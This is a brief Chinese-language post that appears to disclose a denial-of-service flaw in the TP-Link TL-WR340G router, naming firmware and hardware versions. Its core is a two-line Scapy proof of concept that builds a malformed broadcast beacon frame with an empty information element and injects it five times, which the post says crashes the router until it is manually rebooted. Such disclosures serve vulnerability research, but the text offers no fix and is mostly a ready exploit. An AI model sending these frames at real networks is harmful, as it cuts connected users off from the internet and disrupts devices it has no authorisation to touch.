TL-WR340G是TP-Link出品的一款羽量級無線路由器,近日有國外駭客發現了這款路由器上的一個拒絕服務漏洞,只要發送一個簡單的畸形包到路由器,便可使路由器停止工作,需要手動重啟路由器才能恢復正常,算是比較嚴重的了
漏洞細節:
型號:TL-WR340G無線路由器
固件版本: 4.7.11 Build 101102 Rel.60376n
硬體版本:WR340G v3
觸發漏洞的過程非常簡單,需要用到網路軟體Scapy,構造包的詳情如下:
fr = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff",addr2="<AP MAC>",addr3="<AP MAC>")/Dot11Beacon()/Dot11Elt()
接下來發送資料包:
sendp(fr,iface="injection capable wireless interface",count=5)
攻擊成功之後,路由器將直接掛掉,具體表現就是不管已經連接還是未連接的用戶端都無法連接互聯網,除非手動登入管理介面軟重啟或者斷電重啟。